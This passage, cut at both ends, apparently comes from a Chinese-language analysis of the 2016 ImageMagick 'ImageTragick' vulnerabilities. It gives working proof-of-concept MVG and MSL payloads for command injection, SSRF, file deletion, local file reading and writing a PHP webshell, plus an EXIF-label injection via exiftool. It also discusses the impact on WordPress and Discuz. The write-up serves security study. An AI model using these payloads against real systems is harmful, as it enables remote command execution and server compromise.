\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u4e3avul.gif\uff0c\u800cImageMagick\u4f1a\u6839\u636e\u5176\u5185\u5bb9\u8bc6\u522b\u4e3amvg\u56fe\u7247\uff09\uff0c\u5e76\u5728`https://`\u540e\u9762\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u51
99\u5165\u81ea\u5df1\u8981\u6267\u884c\u7684\u547d\u4ee4\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://\"|id; \")'\r\npop graphic-context\r\n```\r\n\u8fd9\u6837\uff0cImageMagick\u5728\u6b63\u5e38\u6267\u884c\u56fe\u7247\u8f6c\u6362\u3001\u5904\u7406\u7684\u65f6\u5019\u5c31\u4f1a\u89e6\u53d1\u6f0f\u6d1e\uff1a\r\n\r\n\r\n\r\n\u5176\u4ed6\u51e0\u4e2aCVE\u4e5f\u6bd4\u8f83\u6709\u8da3\uff0c\u6bd4\u5982CVE-2016-3718\uff0c\u4ed6\u662f\u5229\u7528mvg\u683c\u5f0f\u4e2d\u53ef\u4ee5\u5305\u542burl\u7684\u7279\u70b9\uff0c\u8fdb\u884cSSRF\u653b\u51fb\uff0cPOC\u5982\u4e0b\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n```\r\n\r\nCVE-2016-3715\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684ephemeral\u534f\u8bae\uff0c\u6765\u5220\u9664\u4efb\u610f\u6587\u4ef6\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n```\r\n\r\nCVE-2016-3716\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684msl\u534f\u8bae\uff0c\u6765\u8fdb\u884c\u6587\u4ef6\u7684\u8bfb\u53d6\u548c\u5199\u5165\u3002\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c06\u4efb\u610f\u6587\u4ef6\u5199\u4e3a\u4efb\u610f\u6587\u4ef6\uff0c\u6bd4\u5982\u5c06\u56fe\u7247\u5199\u4e3a\u4e00\u4e2a.php\u540e\u7f00\u7684webshell\u3002\r\n\r\n\u7279\u522b\u8bf4\u660e\u7684\u662f\uff0cmsl\u534f\u8bae\u662f\u8bfb\u53d6\u4e00\u4e2amsl\u683c\u5f0f\u7684xml\u6587\u4ef6\uff0c\u5e76\u6839\u636e\u5176\u5185\u5bb9\u6267\u884c\u4e00\u4e9b\u64cd\u4f5c\uff1a\r\n\r\n```\r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n\r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" 
/>\r\n</image>\r\n```\r\n\r\nCVE-2016-3717\u53ef\u4ee5\u9020\u6210\u672c\u5730\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@/etc/hosts'\r\npop graphic-context\r\n```\r\n\r\n### 0x02 \u6df1\u5165\u5206\u6790\r\n\u9664\u4e86\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u4ee5\u5916\uff0c\u5404\u4e2a\u5b89\u5168\u7814\u7a76\u4eba\u5458\u4e5f\u96c6\u601d\u5e7f\u76ca\uff0c\u53d1\u73b0\u8fd9\u4e2a\u6d1e\u7684\u66f4\u591a\u5229\u7528/\u5f71\u54cd\u65b9\u5f0f\u3002\r\n\r\n\u9996\u5148\uff0cPHP\u6269\u5c55\u300eImageMagick\u300f\u4e5f\u5b58\u5728\u8fd9\u4e2a\u95ee\u9898\uff0c\u800c\u4e14\u53ea\u9700\u8981\u8c03\u7528\u4e86Imagick\u7c7b\u7684\u6784\u9020\u65b9\u6cd5\uff0c\u5373\u53ef\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff1a\r\n\r\n```\r\n<?php\r\nnew Imagick('vul.gif');\r\n\r\n```\r\n\u56e0\u4e3a\u6ca1\u6709\u8fd4\u56de\u503c\uff0c\u6211\u5229\u7528cloudeye\u6355\u6349\u5230apache\u65e5\u5fd7\uff0c\u4ece\u65e5\u5fd7\u4e2d\u8bfb\u53d6\u547d\u4ee4\u6267\u884c\u7684\u7ed3\u679c\uff1a\r\n\r\n\r\n\r\n\u53e6\u5916\uff0c\u7ecf\u8fc7\u5206\u6790\uff0c\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u9664\u4e86.mvg\u683c\u5f0f\u7684\u56fe\u7247\u4ee5\u5916\uff0c\u666e\u901apng\u683c\u5f0f\u7684\u56fe\u7247\u4e5f\u80fd\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002\u6211\u4eec\u770b\u5230\u524d\u9762\u59d4\u6258\u4e2d\u5bf9%l\uff0c\u4e5f\u5c31\u662fexif label\u7684\u5904\u7406\uff1a\r\n```\r\n<delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " 
"ephemeral:%i"\"/>\r\n```\r\n\u5b83\u5c06%l\u62fc\u63a5\u8fdb\u5165\u4e86/usr/bin/display\u547d\u4ee4\u4e2d\uff0c\u6240\u4ee5\u6211\u53ea\u9700\u5c06\u6b63\u5e38\u7684png\u56fe\u7247\uff0c\u5e26\u4e0a\u4e00\u4e2a\u300e\u6076\u610f\u300f\u7684exif\u4fe1\u606f\u3002\u5728\u8c03\u7528ImageMagick\u5c06\u5176\u5904\u7406\u6210.show\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u5373\u53ef\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff1a\r\n\r\n```\r\nexiftool -label=\"\\\"|/usr/bin/id; \\\"\" test.png\r\nconvert test.png o.show\r\n```\r\n\r\n\r\n\u4f46\u8fd9\u4e2a\u65b9\u6cd5\u9e21\u808b\u4e4b\u5904\u5728\u4e8e\uff0c\u56e0\u4e3adelegate.xml\u4e2d\u914d\u7f6e\u7684encode=\"show\"\uff08\u6216\"win\"\uff09\uff0c\u6240\u4ee5\u53ea\u6709\u8f93\u51fa\u4e3a.show\u6216.win\u683c\u5f0f\u7684\u60c5\u51b5\u4e0b\u624d\u4f1a\u8c03\u7528\u8fd9\u4e2a\u59d4\u6258\uff0c\u800c\u666e\u901a\u7684\u6587\u4ef6\u5904\u7406\u662f\u4e0d\u4f1a\u89e6\u53d1\u8fd9\u4e2a\u547d\u4ee4\u7684\u3002\r\n\r\n### 0x03 \u5f71\u54cd\u5206\u6790\r\n\r\nImageMagick\u662f\u4e00\u4e2a\u4f7f\u7528\u975e\u5e38\u5e7f\u7684\u7ec4\u4ef6\uff0c\u5927\u91cf\u5382\u5546\u90fd\u5728\u5904\u7406\u56fe\u7247\u7684\u65f6\u5019\u8c03\u7528\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u5904\u7406\uff0c\u800c\u4e14\u5f88\u591a\u5f00\u6e90\u5e94\u7528\u4e5f\u5728\u6838\u5fc3\u4ee3\u7801\u4e2d\u5305\u542b\u4e86ImageMagick\u9009\u9879\u3002\r\n\r\nWordpress\u662f\u8457\u540d\u7684\u4e2a\u4eba\u535a\u5ba2/CMS\u5382\u5546\uff0c\u5176\u6838\u5fc3\u6e90\u7801\u4e2d\u4f7f\u7528\u4e86PHP\u6269\u5c55ImageMagick\u3002\u53d7\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u5728\u653b\u51fb\u8005\u62e5\u6709\u4e00\u5b9a\u6743\u9650\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u5728Wordpress\u4e2d\u89e6\u53d1\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff1a [WooYun: 
Wordpress\u67d0\u6838\u5fc3\u529f\u80fd\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08\u4e00\u5b9a\u6743\u9650\uff09](http://www.wooyun.org/bugs/wooyun-2016-0205047)\r\n\r\n\u540c\u6837\u7684\uff0cDiscuz\u3001Drupal\u7b49\u5e38\u7528CMS\u4e2d\u4e5f\u8c03\u7528\u4e86ImageMagick\u6269\u5c55\u6216ImageMagick\u5e93\uff0cCVE-2016-3714\u4e5f\u53ef\u80fd\u4f1a\u5f71\u54cd\u5230\u4ed6\u4eec\u3002\r\n\r\n\u4f46\u6839\u636e\u6211\u5bf9Discuz\u7684\u5206\u6790\uff0c\u5176\u8c03\u7528ImageMagick\u5904\u7406\u56fe\u7247\u4e4b\u524d\uff0c\u4f1a\u5148\u4f7f\u7528php\u7684getimagesize\u8fdb\u884c\u56fe\u7247\u683c\u5f0f\u3001\u5927\u5c0f\u7684\u9a8c\u8bc1\uff0c\u6240\u4ee5\u672c\u6587\u4e2d\u6240\u6d89\u53ca\u7684POC\u65e0\u6cd5\u5728Disucz\u4e2d\u76f4\u63a5\u4f7f\u7528\uff0c\u4f46\u4e0d\u6392\u9664\u6709\u5176\u4ed6\u65b9\u6cd5\u7ed5\u8fc7discuz\u5bf9\u8be5\u95ee\u9898\u7684\u9650\u5